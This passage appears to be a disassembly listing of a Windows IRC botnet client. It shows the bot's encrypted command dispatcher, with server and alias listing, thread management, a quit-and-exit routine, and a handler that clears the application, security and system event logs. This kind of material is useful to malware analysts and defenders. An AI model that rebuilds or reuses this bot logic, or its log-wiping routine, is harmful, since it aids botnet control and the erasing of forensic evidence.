; ---------------------------------------------------------------------------
loc_40AD25: ; CODE XREF: sub_40A938+279�j
; sub_40A938+28A�j
push offset aWhdag1glagf_ ; "WHdAg1glAgf."
push 0Fh
jmp loc_40A9A8
; ---------------------------------------------------------------------------
loc_40AD31: ; CODE XREF: sub_40A938+168�j
; sub_40A938+179�j ...
push offset aMflx2_qu4vy_ ; "mflX2.QU4VY."
push 8
jmp loc_40A9A8
; ---------------------------------------------------------------------------
loc_40AD3D: ; CODE XREF: sub_40A938+11D�j
; sub_40A938+12E�j
push offset aFfec81uznt81 ; "fFEC81UzNT81"
push 3
jmp loc_40A9A8
; ---------------------------------------------------------------------------
loc_40AD49: ; CODE XREF: sub_40A938+56�j
; sub_40A938+3C6�j
push offset aDehziSaO0 ; "deHZI/SA//o0"
push dword ptr [ebx]
call edi ; dword_437174
test eax, eax
jnz short loc_40ADA3
cmp [ebp+arg_20], eax
mov edi, offset aTy2nt0oi2yk ; "ty2nT0oI2YK/"
mov esi, offset a5v1zc1efrzg_tc ; "5v1zc1EfRZg.tccap0cH5OH0NHckR.k9Wj.1"
mov ebx, offset aSS_1 ; "%s %s"
jz short loc_40AD8C
cmp [ebp+arg_18], eax
jnz short loc_40AD96
cmp [ebp+arg_14], eax
jnz loc_4148CF
mov eax, [ebp+arg_C]
push esi
push edi
push ebx
push dword ptr [eax+0Ch]
push [ebp+arg_10]
call sub_41CD84
add esp, 14h
loc_40AD8C: ; CODE XREF: sub_40A938+430�j
cmp [ebp+arg_18], 0
jz loc_4148CF
loc_40AD96: ; CODE XREF: sub_40A938+435�j
push esi
push edi
push ebx
loc_40AD99: ; CODE XREF: sub_40A938+73F�j
mov eax, [ebp+arg_C]
push dword ptr [eax]
jmp loc_4146CD
; ---------------------------------------------------------------------------
loc_40ADA3: ; CODE XREF: sub_40A938+41C�j
push dword ptr [ebx]
push offset aDj9owUmrbd_ ; "dJ9OW/uMRBD."
call edi ; dword_437174
test eax, eax
jnz loc_40AE98
mov ebx, [ebx+4]
cmp ebx, esi
jnz short loc_40AE07
mov ecx, dword_457CEC
mov edx, offset aSsl ; " (SSL)"
mov eax, ecx
imul eax, 0B8h
cmp dword_443FD4[eax], esi
jnz short loc_40ADDB
mov edx, offset byte_454A34
loc_40ADDB: ; CODE XREF: sub_40A938+49C�j
push edx
push dword_443FD0[eax]
lea eax, dword_443F20[eax]
push eax
mov eax, [ebp+arg_C]
push ecx
push offset aTy2nt0oi2yk ; "ty2nT0oI2YK/"
push offset aSServerISDS ; "%s: Server: [%i: %s:%d%s]"
push dword ptr [eax+0Ch]
push [ebp+arg_10]
call sub_41CD84
jmp loc_412BF1
; ---------------------------------------------------------------------------
loc_40AE07: ; CODE XREF: sub_40A938+481�j
push ebx
push offset aPlsymAee6v1 ; "PlsYM/aEe6v1"
call edi ; dword_437174
test eax, eax
jnz loc_4148CF
mov esi, [ebp+arg_C]
push offset aListComplete ; "-=[List Complete]=-"
push dword ptr [esi+0Ch]
push [ebp+arg_10]
call sub_41CD84
xor ebx, ebx
add esp, 0Ch
cmp dword_445D00, ebx
jle short loc_40AE7E
mov edi, offset dword_443FD0
loc_40AE3C: ; CODE XREF: sub_40A938+544�j
cmp dword ptr [edi+4], 0
mov eax, offset aSsl ; " (SSL)"
jnz short loc_40AE4C
mov eax, offset byte_454A34
loc_40AE4C: ; CODE XREF: sub_40A938+50D�j
push offset dword_443EF4
push eax
push dword ptr [edi]
lea eax, [edi-0B0h]
push eax
push ebx
push offset aISDSS ; "%i: %s:%d%s, %s"
push dword ptr [esi+0Ch]
push [ebp+arg_10]
call sub_41CD84
add esp, 20h
inc ebx
add edi, 0B8h
cmp ebx, dword_445D00
jl short loc_40AE3C
loc_40AE7E: ; CODE XREF: sub_40A938+4FD�j
push offset aTy2nt0oi2yk ; "ty2nT0oI2YK/"
push offset aSServerListCom ; "%s Server List complete."
push dword ptr [esi+0Ch]
loc_40AE8B: ; CODE XREF: sub_40A938+46EE�j
push [ebp+arg_10]
call sub_41CD84
jmp loc_414688
; ---------------------------------------------------------------------------
loc_40AE98: ; CODE XREF: sub_40A938+476�j
push dword ptr [ebx]
push offset aL3nyw_d7tfl_ ; "l3nYW.D7Tfl."
call edi ; dword_437174
test eax, eax
jnz loc_40AF66
cmp [ebp+arg_14], eax
mov esi, [ebp+arg_C]
mov edi, offset aTy2nt0oi2yk ; "ty2nT0oI2YK/"
mov ebx, offset aSAliasList ; "%s [Alias list]"
jnz short loc_40AED0
cmp [ebp+arg_18], eax
jnz short loc_40AED6
push edi
push ebx
push dword ptr [esi+0Ch]
push [ebp+arg_10]
call sub_41CD84
add esp, 10h
loc_40AED0: ; CODE XREF: sub_40A938+581�j
cmp [ebp+arg_18], 0
jz short loc_40AEE5
loc_40AED6: ; CODE XREF: sub_40A938+586�j
push edi
push ebx
push dword ptr [esi]
push [ebp+arg_10]
call sub_41CD0E
add esp, 10h
loc_40AEE5: ; CODE XREF: sub_40A938+59C�j
xor ebx, ebx
cmp dword_437330, ebx
jle loc_4148CF
mov edi, offset dword_4570A0
loc_40AEF8: ; CODE XREF: sub_40A938+627�j
cmp byte ptr [edi], 0
jz short loc_40AF52
lea eax, [edi+18h]
push eax
push edi
push ebx
lea eax, [ebp+var_26EE0]
push offset aD_SS ; "%d. %s = %s"
push eax
call sub_429A33
add esp, 14h
cmp [ebp+arg_14], 0
jnz short loc_40AF38
cmp [ebp+arg_18], 0
jnz short loc_40AF3E
lea eax, [ebp+var_26EE0]
push eax
push dword ptr [esi+0Ch]
push [ebp+arg_10]
call sub_41CD84
add esp, 0Ch
loc_40AF38: ; CODE XREF: sub_40A938+5E3�j
cmp [ebp+arg_18], 0
jz short loc_40AF52
loc_40AF3E: ; CODE XREF: sub_40A938+5E9�j
lea eax, [ebp+var_26EE0]
push eax
push dword ptr [esi]
push [ebp+arg_10]
call sub_41CD0E
add esp, 0Ch
loc_40AF52: ; CODE XREF: sub_40A938+5C3�j
; sub_40A938+604�j
inc ebx
add edi, 0B8h
cmp ebx, dword_437330
jl short loc_40AEF8
jmp loc_4148CF
; ---------------------------------------------------------------------------
loc_40AF66: ; CODE XREF: sub_40A938+56B�j
push dword ptr [ebx]
push offset aP00ls0k4t_n1 ; "P00Ls0K4t.N1"
call edi ; dword_437174
test eax, eax
jnz loc_40B07C
cmp [ebx+4], esi
jz loc_40B03B
mov eax, [ebx+8]
cmp eax, esi
jz loc_40B03B
push eax
lea eax, [ebp+var_2D24]
push offset aS_5 ; "%s"
push eax
call sub_429A33
add esp, 0Ch
push 3
pop edi
cmp [ebp+arg_4], edi
jle short loc_40AFE2
loc_40AFA8: ; CODE XREF: sub_40A938+6A8�j
mov eax, [ebx+edi*4]
cmp eax, esi
jz short loc_40AFDC
push eax
lea eax, [ebp+var_62D0]
push offset aS_1 ; " %s"
push eax
call sub_429A33
lea eax, [ebp+var_62D0]
push 104h
push eax
lea eax, [ebp+var_2D24]
push eax
call sub_429910
add esp, 18h
loc_40AFDC: ; CODE XREF: sub_40A938+675�j
inc edi
cmp edi, [ebp+arg_4]
jl short loc_40AFA8
loc_40AFE2: ; CODE XREF: sub_40A938+66E�j
lea eax, [ebp+var_2D24]
push eax
push dword ptr [ebx+4]
call sub_418CCA
cmp [ebp+arg_14], 0
mov esi, [ebp+arg_C]
pop ecx
mov edi, offset aTy2nt0oi2yk ; "ty2nT0oI2YK/"
pop ecx
mov ebx, offset aSAddedAliasS ; "%s Added Alias: %s"
jnz short loc_40B023
cmp [ebp+arg_18], 0
jnz short loc_40B02D
lea eax, [ebp+var_2D24]
push eax
push edi
push ebx
push dword ptr [esi+0Ch]
push [ebp+arg_10]
call sub_41CD84
add esp, 14h
loc_40B023: ; CODE XREF: sub_40A938+6CC�j
cmp [ebp+arg_18], 0
jz loc_4148CF
loc_40B02D: ; CODE XREF: sub_40A938+6D2�j
lea eax, [ebp+var_2D24]
loc_40B033: ; CODE XREF: sub_40A938+2445�j
; sub_40A938+4B84�j ...
push eax
loc_40B034: ; CODE XREF: sub_40A938+D3B�j
; sub_40A938+83BA�j
push edi
loc_40B035: ; CODE XREF: sub_40A938+171E�j
; sub_40A938+4929�j ...
push ebx
jmp loc_4146CB
; ---------------------------------------------------------------------------
loc_40B03B: ; CODE XREF: sub_40A938+642�j
; sub_40A938+64D�j
cmp [ebp+arg_14], 0
mov edi, offset aTy2nt0oi2yk ; "ty2nT0oI2YK/"
mov esi, offset aSS_1 ; "%s %s"
mov ebx, offset aFoabg1acvfoOsd ; "fOaBg1ACVfo/osdpb1E0v95."
jnz short loc_40B06A
cmp [ebp+arg_18], 0
jnz short loc_40B074
mov eax, [ebp+arg_C]
push ebx
push edi
push esi
push dword ptr [eax+0Ch]
push [ebp+arg_10]
call sub_41CD84
add esp, 14h
loc_40B06A: ; CODE XREF: sub_40A938+716�j
cmp [ebp+arg_18], 0
jz loc_4148CF
loc_40B074: ; CODE XREF: sub_40A938+71C�j
push ebx
push edi
push esi
jmp loc_40AD99
; ---------------------------------------------------------------------------
loc_40B07C: ; CODE XREF: sub_40A938+639�j
and [ebp+var_4], 0
cmp dword_437330, 0
mov esi, [ebp+arg_C]
jle loc_40B1C2
mov [ebp+arg_68], offset dword_4570B8
loc_40B097: ; CODE XREF: sub_40A938+884�j
mov eax, [ebp+arg_68]
push dword ptr [ebx]
add eax, 0FFFFFFE8h
push eax
call edi ; dword_437174
test eax, eax
jnz loc_40B1A9
movsx eax, byte_443988
push [ebp+arg_68]
push eax
lea eax, [ebp+var_9A20]
push offset dword_4416AC
push eax
call sub_429A33
mov ecx, [ebp+arg_10]
add esp, 10h
call sub_41DA92
push eax
lea eax, [ebp+var_9A20]
push offset off_4416A8
push eax
call sub_427931
mov ecx, [ebp+arg_10]
add esp, 0Ch
call sub_41DA96
push eax
lea eax, [ebp+var_9A20]
push offset aUser_0 ; "$user"
push eax
call sub_427931
push offset dword_443EF4
lea eax, [ebp+var_9A20]
push offset aChan ; "$chan"
push eax
call sub_427931
push dword ptr [ebx+4]
lea eax, [ebp+var_9A20]
push offset a1_0 ; "$1"
push eax
call sub_427931
push dword ptr [ebx+8]
lea eax, [ebp+var_9A20]
push offset a2 ; "$2"
push eax
call sub_427931
push dword ptr [ebx+0Ch]
lea eax, [ebp+var_9A20]
push offset a3 ; "$3"
push eax
call sub_427931
push dword ptr [ebx+10h]
lea eax, [ebp+var_9A20]
push offset a4_0 ; "$4"
push eax
call sub_427931
add esp, 48h
lea eax, [ebp+var_9A20]
push dword ptr [ebx+14h]
push offset a5 ; "$5"
push eax
call sub_427931
push dword ptr [ebx+18h]
lea eax, [ebp+var_9A20]
push offset a6 ; "$6"
push eax
call sub_427931
push 0
lea eax, [ebp+var_9A20]
push [ebp+arg_14]
push [ebp+arg_10]
push esi
push eax
call sub_40A86F
add esp, 2Ch
loc_40B1A9: ; CODE XREF: sub_40A938+76C�j
inc [ebp+var_4]
add [ebp+arg_68], 0B8h
mov eax, [ebp+var_4]
cmp eax, dword_437330
jl loc_40B097
loc_40B1C2: ; CODE XREF: sub_40A938+752�j
push dword ptr [ebx]
push offset aEuior0ay2w7__0 ; "EUIOR0ay2w7."
call edi ; dword_437174
test eax, eax
jnz loc_40B33D
mov ebx, [ebx+4]
test ebx, ebx
jz loc_40B2DD
push ebx
call sub_42A030
test eax, eax
pop ecx
mov [ebp+arg_C], eax
jl loc_40B297
cmp eax, 3
jge loc_40B297
mov ecx, [ebp+arg_10]
push eax
call sub_41C63E
test eax, eax
mov ebx, offset aTy2nt0oi2yk ; "ty2nT0oI2YK/"
jz short loc_40B257
cmp [ebp+arg_14], 0
mov edi, offset aEuior0ay2w7_ ; "EUIOR0ay2w7."
jnz short loc_40B239
cmp [ebp+arg_18], 0
jnz short loc_40B243
push edi
push [ebp+arg_C]
push offset a5_xnq0cowxs0 ; "5.Xnq0cowXs0"
push ebx
push offset aSSIS ; "%s %s (%i) %s"
push dword ptr [esi+0Ch]
push [ebp+arg_10]
call sub_41CD84
add esp, 1Ch
loc_40B239: ; CODE XREF: sub_40A938+8DC�j
cmp [ebp+arg_18], 0
jz loc_4148CF
loc_40B243: ; CODE XREF: sub_40A938+8E2�j
push edi
push [ebp+arg_C]
push offset a5_xnq0cowxs0 ; "5.Xnq0cowXs0"
push ebx
push offset aSSIS ; "%s %s (%i) %s"
jmp loc_4148C2
; ---------------------------------------------------------------------------
loc_40B257: ; CODE XREF: sub_40A938+8D1�j
cmp [ebp+arg_14], 0
mov edi, offset aSSI ; "%s %s (%i)"
jnz short loc_40B280
cmp [ebp+arg_18], 0
jnz short loc_40B28A
push [ebp+arg_C]
push offset a8y4sz09fdh50tc ; "8Y4sz09fDH50tccap0cH5OH0/mDXM1sxCV2/iNR"...
push ebx
push edi
push dword ptr [esi+0Ch]
push [ebp+arg_10]
call sub_41CD84
add esp, 18h
loc_40B280: ; CODE XREF: sub_40A938+928�j
cmp [ebp+arg_18], 0
jz loc_4148CF
loc_40B28A: ; CODE XREF: sub_40A938+92E�j
push [ebp+arg_C]
push offset a8y4sz09fdh50tc ; "8Y4sz09fDH50tccap0cH5OH0/mDXM1sxCV2/iNR"...
jmp loc_414855
; ---------------------------------------------------------------------------
loc_40B297: ; CODE XREF: sub_40A938+8B2�j
; sub_40A938+8BB�j
cmp [ebp+arg_14], 0
mov edi, offset aSSI ; "%s %s (%i)"
mov ebx, offset aRnyaa0crtpo0yy ; "RNYAA0crTPO0yYB2h.Fe8bw.iRLzu0EdQ3j/1D6"...
jnz short loc_40B2C5
cmp [ebp+arg_18], 0
jnz short loc_40B2CF
push [ebp+arg_C]
push ebx
push offset aTy2nt0oi2yk ; "ty2nT0oI2YK/"
push edi
push dword ptr [esi+0Ch]
push [ebp+arg_10]
call sub_41CD84
add esp, 18h
loc_40B2C5: ; CODE XREF: sub_40A938+96D�j
cmp [ebp+arg_18], 0
jz loc_4148CF
loc_40B2CF: ; CODE XREF: sub_40A938+973�j
push [ebp+arg_C]
loc_40B2D2: ; CODE XREF: sub_40A938+1BC9�j
push ebx
push offset aTy2nt0oi2yk ; "ty2nT0oI2YK/"
jmp loc_414856
; ---------------------------------------------------------------------------
loc_40B2DD: ; CODE XREF: sub_40A938+8A0�j
push dword ptr [esi+8]
mov ecx, [ebp+arg_10]
push dword ptr [esi+4]
push dword ptr [esi]
call sub_41C598
cmp eax, 0FFFFFFFFh
jz loc_4148CF
cmp [ebp+arg_14], 0
mov ebx, offset aTy2nt0oi2yk ; "ty2nT0oI2YK/"
mov edi, offset aEuior0ay2w7_ ; "EUIOR0ay2w7."
jnz short loc_40B323
cmp [ebp+arg_18], 0
jnz short loc_40B32D
push edi
push dword ptr [esi]
push ebx
push offset aSS_1 ; "%s %s"
push dword ptr [esi+0Ch]
push [ebp+arg_10]
call sub_41CD84
add esp, 18h
loc_40B323: ; CODE XREF: sub_40A938+9CC�j
cmp [ebp+arg_18], 0
jz loc_4148CF
loc_40B32D: ; CODE XREF: sub_40A938+9D2�j
mov esi, [esi]
push edi
push esi
push ebx
push offset aSS_1 ; "%s %s"
push esi
jmp loc_414859
; ---------------------------------------------------------------------------
loc_40B33D: ; CODE XREF: sub_40A938+895�j
push dword ptr [ebx]
push offset aPdazx1odsoh0 ; "PDazX1oDSOh0"
call edi ; dword_437174
test eax, eax
jnz short loc_40B35A
push dword ptr [esi+0Ch]
mov ecx, [ebp+arg_10]
call sub_41C6FF
jmp loc_4148CF
; ---------------------------------------------------------------------------
loc_40B35A: ; CODE XREF: sub_40A938+A10�j
push offset aUc6wg1ovwvt1 ; "uc6Wg1OvWVt1"
push dword ptr [ebx]
call edi ; dword_437174
test eax, eax
jnz loc_40B494
mov ebx, [ebx+4]
xor edi, edi
cmp ebx, edi
jz loc_4148CF
push ebx
call sub_4154E4
push eax
push offset dword_443E6C
call sub_42B190
add esp, 0Ch
test eax, eax
jnz loc_4148CF
mov ebx, [ebp+arg_20]
push offset aO_sxv_ze9bk1go ; "O.sxv.ze9bK1GOISY.dO.Vn1"
push 3
push edi
push ebx
push [ebp+arg_18]
push [ebp+arg_14]
push [ebp+arg_10]
push dword ptr [esi+0Ch]
call sub_42358B
mov eax, [ebp+arg_14]
add esp, 20h
mov [ebp+var_E64], eax
mov [ebp+var_E68], ebx
push dword ptr [esi+0Ch]
lea eax, [ebp+var_F14]
push eax
call dword_4370A4 ; lstrcpyA
mov eax, [ebp+arg_10]
push offset aUnsecured ; "Unsecured"
push offset aJvatg1988z81 ; "jVATg1988z81"
push offset aSS_ ; "%s %s."
push 3
mov [ebp+var_F18], eax
mov [ebp+var_E84], edi
mov [ebp+var_E80], edi
call sub_4233DE
add esp, 10h
mov [ebp+var_E94], eax
lea eax, [ebp+arg_0]
push eax
lea eax, [ebp+var_F18]
push edi
push eax
push offset sub_421F40
push edi
push edi
call dword_43717C ; CreateThread
mov ecx, [ebp+var_E94]
mov ebx, dword_43718C
imul ecx, 2724h
cmp eax, edi
mov dword_46D70C[ecx], eax
jz short loc_40B44A
jmp short loc_40B442
; ---------------------------------------------------------------------------
loc_40B43E: ; CODE XREF: sub_40A938+B10�j
push 32h
call ebx ; dword_43718C
loc_40B442: ; CODE XREF: sub_40A938+B04�j
cmp [ebp+var_E5C], edi
jz short loc_40B43E
loc_40B44A: ; CODE XREF: sub_40A938+B02�j
push 3E8h
call ebx ; dword_43718C
push edi
push edi
call sub_427CE1
pop ecx
mov eax, offset dword_43D664
pop ecx
push eax
push eax
push dword ptr [esi]
push offset a6f3al1m_ydx05y ; "6f3aL1m.YdX05ythl/YiVnR/jSlje0VWu/50peq"...
push offset aSSS@S ; "%s [%s!%s@%s]"
push [ebp+arg_10]
call sub_41C9EE
add esp, 18h
push 3E8h
call ebx ; dword_43718C
mov ecx, [ebp+arg_10]
call sub_41C9BC
call dword_456E38 ; WSACleanup
push edi
call dword_4370C4 ; ExitProcess
loc_40B494: ; CODE XREF: sub_40A938+A2D�j
push dword ptr [ebx]
push offset aVsz2xXqjp5 ; "Vsz2x/xqJP5/"
call edi ; dword_437174
test eax, eax
jnz loc_40B5A6
xor ebx, ebx
cmp dword_457014, ebx
jnz loc_40B570
mov edi, 94h
lea eax, [ebp+var_2978]
push edi
push ebx
push eax
call sub_429690
add esp, 0Ch
lea eax, [ebp+var_2978]
mov [ebp+var_2978], edi
push eax
call dword_437050 ; GetVersionExA
cmp [ebp+var_2968], 2
mov dword ptr [ebp+var_14+4], offset aApplication ; "application"
mov dword ptr [ebp+var_C], offset aSecurity ; "security"
mov dword ptr [ebp+var_C+4], offset aSystem ; "system"
mov [ebp+arg_C], ebx
jnz short loc_40B52E
xor edi, edi
loc_40B4FF: ; CODE XREF: sub_40A938+BF4�j
push dword ptr [ebp+edi*4+var_14+4]
push 0
call dword_456E70 ; OpenEventLogA
mov ebx, eax
test ebx, ebx
jz short loc_40B528
push 0
push ebx
call dword_456E80 ; ClearEventLogA
test eax, eax
jz short loc_40B521
inc [ebp+arg_C]
loc_40B521: ; CODE XREF: sub_40A938+BE4�j
push ebx
call dword_456E2C ; CloseEventLog
loc_40B528: ; CODE XREF: sub_40A938+BD7�j
inc edi
cmp edi, 3
jl short loc_40B4FF
loc_40B52E: ; CODE XREF: sub_40A938+BC3�j
xor eax, eax
cmp [ebp+arg_14], eax
jnz loc_4148CF
cmp [ebp+arg_18], eax
jnz loc_4148CF
cmp [ebp+arg_C], eax
mov edi, offset aTy2nt0oi2yk ; "ty2nT0oI2YK/"
jle short loc_40B565
push 3
push [ebp+arg_C]
push edi
push offset aSClearedDDSysl ; "%s Cleared [%d/%d] syslogs"
push dword ptr [esi+0Ch]
push [ebp+arg_10]
call sub_41CD84
add esp, 18h
loc_40B565: ; CODE XREF: sub_40A938+C12�j
push edi
push offset aSFailedToClear ; "%s Failed to clear syslogs"
jmp loc_40F023
; ---------------------------------------------------------------------------
loc_40B570: ; CODE XREF: sub_40A938+B75�j
mov edi, offset aSAdvapi_dllNot ; "%s Advapi.dll not loaded"
loc_40B575: ; CODE XREF: sub_40A938+287C�j
mov ebx, offset aTy2nt0oi2yk ; "ty2nT0oI2YK/"
loc_40B57A: ; CODE XREF: sub_40A938+2832�j
; sub_40A938+283D�j ...
cmp [ebp+arg_14], 0
jnz short loc_40B596
cmp [ebp+arg_18], 0
jnz short loc_40B5A0
push ebx
push edi
push dword ptr [esi+0Ch]
push [ebp+arg_10]
call sub_41CD84
add esp, 10h
loc_40B596: ; CODE XREF: sub_40A938+C46�j
cmp [ebp+arg_18], 0
loc_40B59A: ; CODE XREF: sub_40A938+60AE�j
jz loc_4148CF
loc_40B5A0: ; CODE XREF: sub_40A938+C4C�j
; sub_40A938+6093�j
push ebx
jmp loc_41467D
; ---------------------------------------------------------------------------
loc_40B5A6: ; CODE XREF: sub_40A938+B67�j
push dword ptr [ebx]
push offset aOb4iqKj5ue_ ; "Ob4iQ/KJ5ue."
call edi ; dword_437174
test eax, eax
jnz loc_40B865
mov eax, [ebx+4]
test eax, eax
jz loc_40B711
push eax
push offset aE0idd0rdw2u ; "e0idD0RDw2U/"
call edi ; dword_437174
test eax, eax
jnz loc_40B711
mov eax, [ebx+8]
test eax, eax
jz loc_4148CF
push eax
push offset a86tb1fspjg0 ; "86tb/1FSpjg0"
call edi ; dword_437174
test eax, eax
jnz loc_40B678
call sub_4234DB
test eax, eax
mov [ebp+arg_C], eax
mov edi, offset aO_sxv_ze9bk1go ; "O.sxv.ze9bK1GOISY.dO.Vn1"
jle short loc_40B63E
cmp [ebp+arg_14], 0
mov ebx, offset aSDS ; "%s %d %s"
jnz short loc_40B625
cmp [ebp+arg_18], 0
jnz short loc_40B62F
push offset aTfee90w_vdg1u8 ; "TFEE90W.vdG1u8Ajp1eidrT.d2k2X/no6gm/"
push eax
push edi
push ebx
push dword ptr [esi+0Ch]
push [ebp+arg_10]
call sub_41CD84
add esp, 18h
loc_40B625: ; CODE XREF: sub_40A938+CCF�j
cmp [ebp+arg_18], 0
jz loc_4148CF
loc_40B62F: ; CODE XREF: sub_40A938+CD5�j
push offset aTfee90w_vdg1u8 ; "TFEE90W.vdG1u8Ajp1eidrT.d2k2X/no6gm/"
push [ebp+arg_C]
loc_40B637: ; CODE XREF: sub_40A938+4FBC�j
push edi
loc_40B638: ; CODE XREF: sub_40A938+8457�j
push ebx
jmp loc_414857
; ---------------------------------------------------------------------------
loc_40B63E: ; CODE XREF: sub_40A938+CC4�j
cmp [ebp+arg_14], 0
mov ebx, offset aSS_1 ; "%s %s"
jnz short loc_40B664
cmp [ebp+arg_18], 0
jnz short loc_40B66E
push offset aIbtox1Hofe0hcx ; "IBtOx1/HOfe0Hcxmb/oUlVg00eWuQ.F61Hj/"
push edi
push ebx
push dword ptr [esi+0Ch]
push [ebp+arg_10]
call sub_41CD84
add esp, 14h
loc_40B664: ; CODE XREF: sub_40A938+D0F�j
cmp [ebp+arg_18], 0
jz loc_4148CF
loc_40B66E: ; CODE XREF: sub_40A938+D15�j
push offset aIbtox1Hofe0hcx ; "IBtOx1/HOfe0Hcxmb/oUlVg00eWuQ.F61Hj/"
jmp loc_40B034
; ---------------------------------------------------------------------------
loc_40B678: ; CODE XREF: sub_40A938+CAF�j
push dword ptr [ebx+8]
call sub_42A030
push eax
call sub_423463
pop ecx
mov edi, offset aSSS_0 ; "%s %s (%s)"
test eax, eax
pop ecx
jz short loc_40B6CD
cmp [ebp+arg_14], 0
jnz short loc_40B6B9
cmp [ebp+arg_18], 0
jnz short loc_40B6C3
push dword ptr [ebx+8]
push offset aTpzyk0moe8_0jt ; "TpzyK0MOE8.0jTPEZ1dC0uG0"
push offset aO_sxv_ze9bk1go ; "O.sxv.ze9bK1GOISY.dO.Vn1"
push edi
push dword ptr [esi+0Ch]
push [ebp+arg_10]
call sub_41CD84
add esp, 18h
loc_40B6B9: ; CODE XREF: sub_40A938+D5D�j
cmp [ebp+arg_18], 0
jz loc_4148CF
loc_40B6C3: ; CODE XREF: sub_40A938+D63�j
push dword ptr [ebx+8]
push offset aTpzyk0moe8_0jt ; "TpzyK0MOE8.0jTPEZ1dC0uG0"
jmp short loc_40B707
; ---------------------------------------------------------------------------
loc_40B6CD: ; CODE XREF: sub_40A938+D57�j
cmp [ebp+arg_14], 0
jnz short loc_40B6F5
cmp [ebp+arg_18], 0
jnz short loc_40B6FF
push dword ptr [ebx+8]
push offset a4ezrg1ye5hp1o2 ; "4Ezrg1ye5hp1O2jqY1BhtQc.jTPEZ1dC0uG0"
push offset aO_sxv_ze9bk1go ; "O.sxv.ze9bK1GOISY.dO.Vn1"
push edi
push dword ptr [esi+0Ch]
push [ebp+arg_10]
call sub_41CD84
add esp, 18h
loc_40B6F5: ; CODE XREF: sub_40A938+D99�j
cmp [ebp+arg_18], 0
jz loc_4148CF
loc_40B6FF: ; CODE XREF: sub_40A938+D9F�j
push dword ptr [ebx+8]
push offset a4ezrg1ye5hp1o2 ; "4Ezrg1ye5hp1O2jqY1BhtQc.jTPEZ1dC0uG0"
loc_40B707: ; CODE XREF: sub_40A938+D93�j
; sub_40A938+E22�j ...
push offset aO_sxv_ze9bk1go ; "O.sxv.ze9bK1GOISY.dO.Vn1"
jmp loc_414856
; ---------------------------------------------------------------------------
loc_40B711: ; CODE XREF: sub_40A938+C84�j
; sub_40A938+C94�j
push 6
call sub_423756
test eax, eax
pop ecx
mov [ebp+arg_C], eax
jle short loc_40B75C
cmp [ebp+arg_14], 0
mov ebx, offset aJqrlpUxr08Qqdu ; "JQrlp/UXr08/qqduw/ZeDHN/N/Wda.tYScO0znN"...
mov edi, offset aSSD_ ; "%s %s (%d)."
jnz short loc_40B74C
cmp [ebp+arg_18], 0
jnz short loc_40B756
push eax
push ebx
push offset aO_sxv_ze9bk1go ; "O.sxv.ze9bK1GOISY.dO.Vn1"
push edi
push dword ptr [esi+0Ch]
push [ebp+arg_10]
call sub_41CD84
add esp, 18h
loc_40B74C: ; CODE XREF: sub_40A938+DF6�j
cmp [ebp+arg_18], 0
jz loc_4148CF
loc_40B756: ; CODE XREF: sub_40A938+DFC�j
push [ebp+arg_C]
push ebx
jmp short loc_40B707
; ---------------------------------------------------------------------------
loc_40B75C: ; CODE XREF: sub_40A938+DE6�j
mov eax, [ebp+arg_14]
mov [ebp+var_AFC], eax
mov eax, [ebp+arg_20]
mov [ebp+var_B00], eax
mov eax, [ebp+arg_18]
mov [ebp+var_AF8], eax
test eax, eax
lea eax, [ebp+var_BAC]
jnz short loc_40B786
push dword ptr [esi+0Ch]
jmp short loc_40B788
; ---------------------------------------------------------------------------
loc_40B786: ; CODE XREF: sub_40A938+E47�j
push dword ptr [esi]
loc_40B788: ; CODE XREF: sub_40A938+E4C�j
push eax
call dword_4370A4 ; lstrcpyA
mov eax, [ebp+arg_10]
mov [ebp+var_BB0], eax
mov ebx, [ebx+4]
test ebx, ebx
jz short loc_40B7B4
push offset aNfknl0nqigy0 ; "NFKNL0nQigY0"
push ebx
call edi ; dword_437174
neg eax
sbb eax, eax
inc eax
mov [ebp+var_B1C], eax
jmp short loc_40B7BB
; ---------------------------------------------------------------------------
loc_40B7B4: ; CODE XREF: sub_40A938+E65�j
and [ebp+var_B1C], 0
loc_40B7BB: ; CODE XREF: sub_40A938+E7A�j
push offset aO_sxv_ze9bk1go ; "O.sxv.ze9bK1GOISY.dO.Vn1"
push offset aSThreadList ; "%s Thread list"
push 6
call sub_4233DE
add esp, 0Ch
mov [ebp+var_B2C], eax
lea eax, [ebp+arg_0]
xor edi, edi
push eax
lea eax, [ebp+var_BB0]
push edi
push eax
push offset sub_423650
push edi
push edi
call dword_43717C ; CreateThread
mov ecx, [ebp+var_B2C]
imul ecx, 2724h
cmp eax, edi
mov dword_46D70C[ecx], eax
jnz short loc_40B858
cmp [ebp+arg_14], 0
mov ebx, dword_43716C
mov edi, offset aSSD_ ; "%s %s (%d)."
jnz short loc_40B839
cmp [ebp+arg_18], 0
jnz short loc_40B843
call ebx ; dword_43716C
push eax
push offset a4ezrg1ye5hp1au ; "4Ezrg1ye5hp1AUz6N/Zzkas/bbUvL0k.zqt1cpO"...
push offset aO_sxv_ze9bk1go ; "O.sxv.ze9bK1GOISY.dO.Vn1"
push edi
push dword ptr [esi+0Ch]
push [ebp+arg_10]
call sub_41CD84
add esp, 18h
loc_40B839: ; CODE XREF: sub_40A938+EDD�j
cmp [ebp+arg_18], 0
jz loc_4148CF
loc_40B843: ; CODE XREF: sub_40A938+EE3�j
call ebx ; dword_43716C
push eax
push offset a4ezrg1ye5hp1au ; "4Ezrg1ye5hp1AUz6N/Zzkas/bbUvL0k.zqt1cpO"...
jmp loc_40B707
; ---------------------------------------------------------------------------
loc_40B850: ; CODE XREF: sub_40A938+F26�j
push 32h
call dword_43718C ; Sleep
loc_40B858: ; CODE XREF: sub_40A938+ECC�j
cmp [ebp+var_AF4], edi
jz short loc_40B850
jmp loc_4148CF
; ---------------------------------------------------------------------------
loc_40B865: ; CODE XREF: sub_40A938+C79�j
push dword ptr [ebx]
push offset aG3obv_r6j7h ; "g3obv.r6j7H/"
call edi ; dword_437174
test eax, eax
jnz loc_40B9AC
push dword ptr [ebx+4]
push offset aDJstMfgyq_ ; "d/Jst/MFgyQ."
call edi ; dword_437174
test eax, eax
jnz loc_40B9AC
push 12h
call sub_423756
xor edi, edi
pop ecx
cmp eax, edi
mov [ebp+arg_C], eax
jle short loc_40B8DE
mov ebx, offset aLtlec18us5q0 ; "LTLec18US5q0"
loc_40B89E: ; CODE XREF: sub_40A938+1604�j
; sub_40A938+1748�j ...
cmp [ebp+arg_14], 0
mov edi, offset aSSD_ ; "%s %s (%d)."
jnz short loc_40B8C7
cmp [ebp+arg_18], 0
jnz short loc_40B8D1
push [ebp+arg_C]
